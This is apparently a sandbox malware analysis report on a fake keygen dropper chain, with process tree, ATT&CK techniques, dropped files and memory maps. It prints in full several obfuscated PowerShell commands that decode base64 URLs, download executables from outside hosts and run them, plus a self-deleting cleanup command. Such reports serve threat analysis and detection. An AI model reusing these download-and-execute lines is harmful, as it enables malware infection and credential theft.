                5⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of AdjustPrivilegeToken
                PID:2552
                • C:\Windows\SysWOW64\WScript.exe
                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs"
                  6⤵
                  • Loads dropped DLL
                  PID:2104
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                    7⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of SetThreadContext
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1376
                    • C:\Windows\SysWOW64\WScript.exe
                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs"
                      8⤵
                      • Loads dropped DLL
                      PID:2368
                      • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                        "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                        9⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of SetThreadContext
                        • Suspicious use of AdjustPrivilegeToken
                        PID:740
                        • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                          "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                          10⤵
                          • Executes dropped EXE
                          PID:1088
                    • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                      "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                      8⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Checks processor information in registry
                      PID:2632
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c taskkill /pid 2632 & erase C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe & RD /S /Q C:\\ProgramData\\213748859316823\\* & exit
                        9⤵
                          PID:2928
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /pid 2632
                            10⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3004
                  • C:\Users\Public\dzl.exe
                    "C:\Users\Public\dzl.exe"
                    6⤵
                    • Executes dropped EXE
                    PID:2144
            • C:\Windows\SysWOW64\mshta.exe
              "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\3FAF.tmp\b1.hta"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:316
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1208
            • C:\Windows\SysWOW64\timeout.exe
              timeout 2
              3⤵
              • Delays execution with timeout.exe
              PID:1312
            • C:\Windows\SysWOW64\mshta.exe
              "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\3FAF.tmp\ba.hta"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:380
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1632
            • C:\Windows\SysWOW64\mshta.exe
              "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\3FAF.tmp\ba1.hta"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1544
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1112

        Network

        MITRE ATT&CK Matrix ATT&CK v6

        Persistence

        Modify Existing Service

        1
        T1031

        Defense Evasion

        Modify Registry

        4
        T1112

        Disabling Security Tools

        2
        T1089

        Install Root Certificate

        1
        T1130

        Credential Access

        Credentials in Files

        3
        T1081

        Discovery

        Query Registry

        2
        T1012

        System Information Discovery

        2
        T1082

        Collection

        Data from Local System

        3
        T1005

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\ProgramData\freebl3.dll
        • C:\ProgramData\mozglue.dll
        • C:\ProgramData\msvcp140.dll
        • C:\ProgramData\nss3.dll
          MD5

          bfac4e3c5908856ba17d41edcd455a51

          SHA1

          8eec7e888767aa9e4cca8ff246eb2aacb9170428

          SHA256

          e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

          SHA512

          2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

        • C:\ProgramData\softokn3.dll
        • C:\ProgramData\sqlite3.dll
        • C:\ProgramData\vcruntime140.dll
        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_231c2208-0720-4eec-b9f1-8bba11abd9fa
        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_57c6647c-75fc-47bb-8ce4-3b8f0921c533
        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6d5fa298-996f-4fc9-9c01-b2226cbdaeba
        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7d6878ec-2a8b-418c-8f2b-b6fcd4b50cf8
        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_82211dc3-bff5-4c26-baf8-2f7e996eaf99
        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_de4eedb8-4762-4c56-b80c-203df3aa6fa8
        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e43ce3f6-b60d-4b70-bed1-86e53bf07360
        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fabbb9cf-9b8c-4b2f-b33d-0de7a9a3a10e
        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
        • C:\Users\Admin\AppData\Local\Temp\3FAF.tmp\Keygen.exe
        • C:\Users\Admin\AppData\Local\Temp\3FAF.tmp\Keygen.exe
        • C:\Users\Admin\AppData\Local\Temp\3FAF.tmp\b.hta
        • C:\Users\Admin\AppData\Local\Temp\3FAF.tmp\b1.hta
        • C:\Users\Admin\AppData\Local\Temp\3FAF.tmp\ba.hta
        • C:\Users\Admin\AppData\Local\Temp\3FAF.tmp\ba1.hta
        • C:\Users\Admin\AppData\Local\Temp\3FAF.tmp\m.hta
        • C:\Users\Admin\AppData\Local\Temp\3FAF.tmp\m1.hta
        • C:\Users\Admin\AppData\Local\Temp\3FAF.tmp\start.bat
        • C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs
        • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
        • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
        • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
        • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
        • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
        • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
        • C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs
        • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
        • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
        • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
        • C:\Users\Admin\AppData\Local\Temp\ewRawcVTtt.exe
        • C:\Users\Admin\AppData\Local\Temp\ewRawcVTtt.exe
        • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
        • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
        • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
        • C:\Users\Admin\AppData\Local\Temp\jYued9RsaG.exe
        • C:\Users\Admin\AppData\Local\Temp\jYued9RsaG.exe
        • C:\Users\Admin\AppData\Local\Temp\pgoFB6KoYZ.exe
        • C:\Users\Admin\AppData\Local\Temp\pgoFB6KoYZ.exe
        • C:\Users\Admin\AppData\Local\Temp\tzYi5pW3H7.exe
        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
        • C:\Users\Public\dzl.exe
        • C:\Users\Public\dzl.exe
        • C:\Users\Public\dzl.exe
        • C:\Users\Public\uci.exe
        • C:\Users\Public\uci.exe
        • C:\Users\Public\uci.exe
        • \??\PIPE\srvsvc
        • \ProgramData\mozglue.dll
        • \ProgramData\mozglue.dll
        • \ProgramData\msvcp140.dll
        • \ProgramData\msvcp140.dll
        • \ProgramData\nss3.dll
          MD5

          bfac4e3c5908856ba17d41edcd455a51

          SHA1

          8eec7e888767aa9e4cca8ff246eb2aacb9170428

          SHA256

          e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

          SHA512

          2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

        • \ProgramData\nss3.dll
          MD5

          bfac4e3c5908856ba17d41edcd455a51

          SHA1

          8eec7e888767aa9e4cca8ff246eb2aacb9170428

          SHA256

          e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

          SHA512

          2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

        • \ProgramData\sqlite3.dll
        • \ProgramData\sqlite3.dll
        • \ProgramData\vcruntime140.dll
        • \ProgramData\vcruntime140.dll
        • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
        • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
        • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\mozglue.dll
        • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\msvcp140.dll
        • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\nss3.dll
          MD5

          02cc7b8ee30056d5912de54f1bdfc219

          SHA1

          a6923da95705fb81e368ae48f93d28522ef552fb

          SHA256

          1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5

          SHA512

          0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

        • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll
        • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\vcruntime140.dll
        • \Users\Admin\AppData\LocalLow\sqlite3.dll
        • \Users\Admin\AppData\Local\Temp\3FAF.tmp\Keygen.exe
        • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
        • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
        • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
        • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
        • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
        • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
        • \Users\Admin\AppData\Local\Temp\axcsdfa.exe
        • \Users\Admin\AppData\Local\Temp\axcsdfa.exe
        • \Users\Admin\AppData\Local\Temp\ewRawcVTtt.exe
        • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
        • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
        • \Users\Admin\AppData\Local\Temp\jYued9RsaG.exe
        • \Users\Admin\AppData\Local\Temp\pgoFB6KoYZ.exe
        • \Users\Admin\AppData\Local\Temp\tzYi5pW3H7.exe
        • \Users\Admin\AppData\Local\Temp\tzYi5pW3H7.exe
        • \Users\Public\dzl.exe
        • \Users\Public\uci.exe
        • \Users\Public\uci.exe
        • memory/316-17-0x0000000000000000-mapping.dmp
        • memory/380-26-0x0000000000000000-mapping.dmp
        • memory/740-237-0x0000000000E30000-0x0000000000E31000-memory.dmp
          Filesize

          4KB

        • memory/740-239-0x0000000000280000-0x0000000000281000-memory.dmp
          Filesize

          4KB

        • memory/740-264-0x0000000000290000-0x00000000002B4000-memory.dmp
          Filesize

          144KB

        • memory/740-236-0x0000000071500000-0x0000000071BEE000-memory.dmp
          Filesize

          6.9MB

        • memory/740-233-0x0000000000000000-mapping.dmp
        • memory/764-35-0x0000000071500000-0x0000000071BEE000-memory.dmp
          Filesize

          6.9MB

        • memory/764-22-0x0000000000000000-mapping.dmp
        • memory/764-131-0x00000000064D0000-0x00000000064D1000-memory.dmp
          Filesize

          4KB

        • memory/1052-15-0x0000000000000000-mapping.dmp
        • memory/1088-268-0x000000000041A684-mapping.dmp
        • memory/1088-270-0x0000000000400000-0x0000000000420000-memory.dmp
          Filesize

          128KB

        • memory/1088-267-0x0000000000400000-0x0000000000420000-memory.dmp
          Filesize

          128KB

        • memory/1112-34-0x0000000071500000-0x0000000071BEE000-memory.dmp
          Filesize

          6.9MB

        • memory/1112-32-0x0000000000000000-mapping.dmp
        • memory/1116-299-0x0000000000000000-mapping.dmp
        • memory/1168-261-0x0000000000000000-mapping.dmp
        • memory/1208-56-0x0000000005400000-0x0000000005401000-memory.dmp
          Filesize

          4KB

        • memory/1208-36-0x0000000071500000-0x0000000071BEE000-memory.dmp
          Filesize

          6.9MB

        • memory/1208-23-0x0000000000000000-mapping.dmp
        • memory/1312-18-0x0000000000000000-mapping.dmp
        • memory/1360-0-0x0000000000000000-mapping.dmp
        • memory/1376-221-0x0000000000CB0000-0x0000000000D01000-memory.dmp
          Filesize

          324KB

        • memory/1376-212-0x0000000071500000-0x0000000071BEE000-memory.dmp
          Filesize

          6.9MB

        • memory/1376-215-0x00000000003F0000-0x00000000003F1000-memory.dmp
          Filesize

          4KB

        • memory/1376-210-0x0000000000000000-mapping.dmp
        • memory/1376-213-0x00000000013C0000-0x00000000013C1000-memory.dmp
          Filesize

          4KB

        • memory/1528-11-0x0000000000000000-mapping.dmp
        • memory/1544-29-0x0000000000000000-mapping.dmp
        • memory/1632-30-0x0000000000000000-mapping.dmp
        • memory/1632-37-0x0000000071500000-0x0000000071BEE000-memory.dmp
          Filesize

          6.9MB

        • memory/1664-10-0x0000000000000000-mapping.dmp
        • memory/1760-4-0x0000000000000000-mapping.dmp
        • memory/1760-5-0x0000000000000000-mapping.dmp
        • memory/1848-8-0x0000000000000000-mapping.dmp
        • memory/1904-85-0x00000000063D0000-0x00000000063D1000-memory.dmp
          Filesize

          4KB

        • memory/1904-77-0x00000000057C0000-0x00000000057C1000-memory.dmp
          Filesize

          4KB

        • memory/1904-64-0x0000000006180000-0x0000000006181000-memory.dmp
          Filesize

          4KB

        • memory/1904-13-0x0000000000000000-mapping.dmp
        • memory/1904-20-0x0000000071500000-0x0000000071BEE000-memory.dmp
          Filesize

          6.9MB

        • memory/1904-70-0x0000000006230000-0x0000000006231000-memory.dmp
          Filesize

          4KB

        • memory/1904-69-0x00000000061C0000-0x00000000061C1000-memory.dmp
          Filesize

          4KB

        • memory/1964-191-0x00000000067B0000-0x00000000067B1000-memory.dmp
          Filesize

          4KB

        • memory/1964-146-0x00000000064E0000-0x00000000064E1000-memory.dmp
          Filesize

          4KB

        • memory/1964-190-0x00000000067A0000-0x00000000067A1000-memory.dmp
          Filesize

          4KB

        • memory/1964-40-0x0000000004B00000-0x0000000004B01000-memory.dmp
          Filesize

          4KB

        • memory/1964-156-0x0000000006690000-0x0000000006691000-memory.dmp
          Filesize

          4KB

        • memory/1964-38-0x00000000024F0000-0x00000000024F1000-memory.dmp
          Filesize

          4KB

        • memory/1964-153-0x00000000065F0000-0x00000000065F1000-memory.dmp
          Filesize

          4KB

        • memory/1964-50-0x0000000002810000-0x0000000002811000-memory.dmp
          Filesize

          4KB

        • memory/1964-12-0x0000000000000000-mapping.dmp
        • memory/1964-21-0x0000000071500000-0x0000000071BEE000-memory.dmp
          Filesize

          6.9MB

        • memory/2104-201-0x0000000000000000-mapping.dmp
        • memory/2132-278-0x0000000000000000-mapping.dmp
        • memory/2144-204-0x000000000043FCC3-mapping.dmp
        • memory/2144-206-0x0000000000400000-0x0000000000493000-memory.dmp
          Filesize

          588KB

        • memory/2144-203-0x0000000000400000-0x0000000000493000-memory.dmp
          Filesize

          588KB

        • memory/2156-280-0x0000000000010000-0x0000000000011000-memory.dmp
          Filesize

          4KB

        • memory/2156-275-0x0000000071500000-0x0000000071BEE000-memory.dmp
          Filesize

          6.9MB

        • memory/2156-272-0x0000000000000000-mapping.dmp
        • memory/2156-293-0x00000000003B0000-0x00000000003B1000-memory.dmp
          Filesize

          4KB

        • memory/2228-286-0x0000000071500000-0x0000000071BEE000-memory.dmp
          Filesize

          6.9MB

        • memory/2228-295-0x00000000000D0000-0x00000000000D1000-memory.dmp
          Filesize

          4KB

        • memory/2228-282-0x0000000000000000-mapping.dmp
        • memory/2228-300-0x0000000000540000-0x0000000000541000-memory.dmp
          Filesize

          4KB

        • memory/2228-302-0x0000000000550000-0x0000000000562000-memory.dmp
          Filesize

          72KB

        • memory/2296-104-0x0000000000000000-mapping.dmp
        • memory/2328-143-0x000007FEF80C0000-0x000007FEF833A000-memory.dmp
          Filesize

          2.5MB

        • memory/2368-235-0x0000000002860000-0x0000000002864000-memory.dmp
          Filesize

          16KB

        • memory/2368-110-0x0000000000000000-mapping.dmp
        • memory/2368-223-0x0000000000000000-mapping.dmp
        • memory/2400-114-0x0000000000000000-mapping.dmp
        • memory/2412-306-0x0000000000000000-mapping.dmp
        • memory/2412-308-0x0000000071500000-0x0000000071BEE000-memory.dmp
          Filesize

          6.9MB

        • memory/2440-120-0x0000000000400000-0x0000000000498000-memory.dmp
          Filesize

          608KB

        • memory/2440-121-0x000000000043FCC3-mapping.dmp
        • memory/2440-123-0x0000000000400000-0x0000000000498000-memory.dmp
          Filesize

          608KB

        • memory/2480-128-0x000000000041A684-mapping.dmp
        • memory/2480-127-0x0000000000400000-0x0000000000425000-memory.dmp
          Filesize

          148KB

        • memory/2480-130-0x0000000000400000-0x0000000000425000-memory.dmp
          Filesize

          148KB

        • memory/2484-289-0x0000000000000000-mapping.dmp
        • memory/2528-134-0x0000000000400000-0x0000000000439000-memory.dmp
          Filesize

          228KB

        • memory/2528-137-0x0000000000417A8B-mapping.dmp
        • memory/2528-139-0x0000000000400000-0x0000000000439000-memory.dmp
          Filesize

          228KB

        • memory/2552-144-0x0000000001130000-0x0000000001131000-memory.dmp
          Filesize

          4KB

        • memory/2552-136-0x0000000000000000-mapping.dmp
        • memory/2552-142-0x0000000071500000-0x0000000071BEE000-memory.dmp
          Filesize

          6.9MB

        • memory/2552-202-0x0000000000B50000-0x0000000000B5D000-memory.dmp
          Filesize

          52KB

        • memory/2552-189-0x0000000000EF0000-0x0000000000FA0000-memory.dmp
          Filesize

          704KB

        • memory/2632-229-0x0000000000400000-0x0000000000434000-memory.dmp
          Filesize

          208KB

        • memory/2632-227-0x0000000000417A8B-mapping.dmp
        • memory/2632-226-0x0000000000400000-0x0000000000434000-memory.dmp
          Filesize

          208KB

        • memory/2656-294-0x00000000002C0000-0x00000000002C1000-memory.dmp
          Filesize

          4KB

        • memory/2656-298-0x0000000000400000-0x0000000000401000-memory.dmp
          Filesize

          4KB

        • memory/2656-301-0x0000000000420000-0x0000000000431000-memory.dmp
          Filesize

          68KB

        • memory/2656-288-0x0000000000000000-mapping.dmp
        • memory/2656-303-0x0000000000570000-0x0000000000573000-memory.dmp
          Filesize

          12KB

        • memory/2656-304-0x0000000004C10000-0x0000000004C12000-memory.dmp
          Filesize

          8KB

        • memory/2656-305-0x0000000000600000-0x0000000000611000-memory.dmp
          Filesize

          68KB

        • memory/2656-292-0x0000000071500000-0x0000000071BEE000-memory.dmp
          Filesize

          6.9MB

        • memory/2876-262-0x0000000000000000-mapping.dmp
        • memory/2928-260-0x0000000000000000-mapping.dmp
        • memory/3004-263-0x0000000000000000-mapping.dmp